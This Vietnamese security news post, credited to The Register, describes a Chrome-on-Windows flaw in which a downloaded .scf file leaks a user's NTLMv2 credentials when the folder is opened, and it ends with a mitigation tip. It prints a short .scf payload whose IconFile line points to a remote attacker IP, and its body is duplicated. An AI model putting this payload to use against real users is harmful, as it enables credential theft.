WhiteHat News #ID:2018
WhiteHat Support
-
20/03/2017
-
129
-
444 bài viết
Lỗ hổng đánh cắp thông tin đăng nhập trên Google Chrome
Các file .SCF (file có phần mở rộng là .scf) phơi bày ID, mật khẩu để truy cập vào các icon cho kẻ tấn công.
Google đang xử lý lỗ hổng đánh cắp thông tin đăng nhập trên Google Chrome chạy trên Microsoft Windows.
Lỗ hổng bị khai thác khi người dùng bị lừa click vào một đường dẫn tải một file Windows .scf (định dạng tệp tin Shell Command lâu đời, một shortcut hiển thị trên Desktop kể từ Windows 98).
Ở đây có 2 vấn đề: cách Chrome xử lý các file .scf và cách Windows xử lý chúng.
Phần lớn các đường dẫn tải về đều được Chrome lọc sạch, ví dụ sau sự cố Stuxnet, trình duyệt buộc phải thêm phần mở rộng .download trên các file Windows LNK nhưng lại không áp dụng với các file .scf.
Nếu người dùng click vào đường dẫn, file độc hại .scf sẽ nằm im trong thư mục /Download đến khi người dùng mở thư mục này.
Đây là lúc lỗ hổng của Windows xuất hiện: nếu chỉ mở folder, khi đó Windows sẽ thử và lấy.scf file.
Để lấy icon này, máy của người dùng sẽ trình các thông tin đăng nhập đến một server – bao gồm ID của người dùng và mật khẩu mã hóa hash trên mạng công ty hoặc thông tin đăng nhập nếu đó là máy tính cá nhân.
Như vậy là đủ để máy tính của người dùng bị tấn công.
Nếu .scf file có chứa đoạn code này:
[Shell]
IconFile=\\170.170.170.170\icon
… thì ID và mật khẩu sẽ được gửi đến IP của kẻ tấn công.
Vì password được mã hóa NTLMv2 nên để khôi phục cần phải tấn công brute-force offline, nhưng ID và mật khẩu hash cũng có thể được dùng cho các dịch vụ khác.
Kiểu tấn công Password brute-forcing có độ khó vừa phải vì một NVIDIA GTX 1080 card có thể lấy được một mật khẩu 8 ký tự trong chưa đến một ngày.
Trong khi chờ bản vá từ Google, người dùng Chrome nên vào Advanced settings và kích hoạt chế độ hỏi địa chỉ lưu file khi download. Bằng cách này, phần mở rộng .scf sẽ được hiển thị.
Google đang xử lý lỗ hổng đánh cắp thông tin đăng nhập trên Google Chrome chạy trên Microsoft Windows.
Ở đây có 2 vấn đề: cách Chrome xử lý các file .scf và cách Windows xử lý chúng.
Phần lớn các đường dẫn tải về đều được Chrome lọc sạch, ví dụ sau sự cố Stuxnet, trình duyệt buộc phải thêm phần mở rộng .download trên các file Windows LNK nhưng lại không áp dụng với các file .scf.
Nếu người dùng click vào đường dẫn, file độc hại .scf sẽ nằm im trong thư mục /Download đến khi người dùng mở thư mục này.
Đây là lúc lỗ hổng của Windows xuất hiện: nếu chỉ mở folder, khi đó Windows sẽ thử và lấy.scf file.
Để lấy icon này, máy của người dùng sẽ trình các thông tin đăng nhập đến một server – bao gồm ID của người dùng và mật khẩu mã hóa hash trên mạng công ty hoặc thông tin đăng nhập nếu đó là máy tính cá nhân.
Như vậy là đủ để máy tính của người dùng bị tấn công.
Nếu .scf file có chứa đoạn code này:
[Shell]
IconFile=\\170.170.170.170\icon
… thì ID và mật khẩu sẽ được gửi đến IP của kẻ tấn công.
Vì password được mã hóa NTLMv2 nên để khôi phục cần phải tấn công brute-force offline, nhưng ID và mật khẩu hash cũng có thể được dùng cho các dịch vụ khác.
Kiểu tấn công Password brute-forcing có độ khó vừa phải vì một NVIDIA GTX 1080 card có thể lấy được một mật khẩu 8 ký tự trong chưa đến một ngày.
Trong khi chờ bản vá từ Google, người dùng Chrome nên vào Advanced settings và kích hoạt chế độ hỏi địa chỉ lưu file khi download. Bằng cách này, phần mở rộng .scf sẽ được hiển thị.
Nguồn: The Register
Chỉnh sửa lần cuối:
